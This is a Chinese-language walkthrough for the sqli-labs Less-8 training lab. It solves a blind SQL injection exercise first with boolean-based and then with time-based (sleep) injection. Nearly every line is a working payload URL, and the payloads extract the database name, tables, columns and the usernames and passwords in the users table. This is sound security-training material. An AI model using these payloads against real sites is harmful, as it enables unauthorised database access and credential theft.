Less-8 延时注入+布尔盲注
判断注入点:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1 显示正常
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ 无任何回显
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ --+ 显示正常,找到注入点,该题特点为正确时返回you are in,错误时无任何回显,可以考虑用之前的布尔盲注或者延时注入进行解题
方法一(布尔盲注):
判断数据库长度:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and length(database())=0 --+
对长度进行猜解,直到返回正确,
猜解数据库名
这里采用substr函数对数据库名进行分割,配合ascii函数,利用二分法进行字母猜解:
先猜解第一个字母:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and ascii(substr(database(),1,1))>100 --+
猜解第二个字母:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and ascii(substr(database(),2,1))>100 --+
猜解当前库中的表:
先猜解第一个表名的第一个字母:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>10 --+
猜解users表中的字段:
先猜解第一个字段的第一个字母:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))>100 --+
猜解username字段的信息:
先猜解第一个信息的第一个字母:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and ascii(substr((select username from security.users limit 0,1),1,1))>10 --+
猜解password字段的信息:
先猜解第一个信息的第一个字母:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and ascii(substr((select password from security.users limit 0,1),1,1))>10 --+
方法二(延时注入):
延时注入与布尔盲注的关系:在可以判断返回正确还是错误的情况下,两种注入方法都可以用,延时注入更倾向于无法判断正误,通过自己构造页面刷新时间来判断正误。
判断为正确时:
判断为错误时:
Sql知识:
If(条件,A,B); 如果条件成立,执行A,否则执行B
Sleep(5);延时5s
判断数据库长度:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and if(length(database())=2,1,sleep(5)) --+
猜解数据库名:
猜解数据库名的第一个字母:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and if(ascii(substr(database(),1,1))>10,1,sleep(5)) --+
猜解security库中的表:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))>10,1,sleep(5)) --+
猜解security库中users表中的字段:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and if(ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))>10,1,sleep(5)) --+
猜解users表中username字段的信息:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and if(ascii(substr((select username from security.users limit 0,1),1,1))>10,1,sleep(5)) --+
猜解users表中password字段的信息:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ and if(ascii(substr((select password from security.users limit 0,1),1,1))>10,1,sleep(5)) --+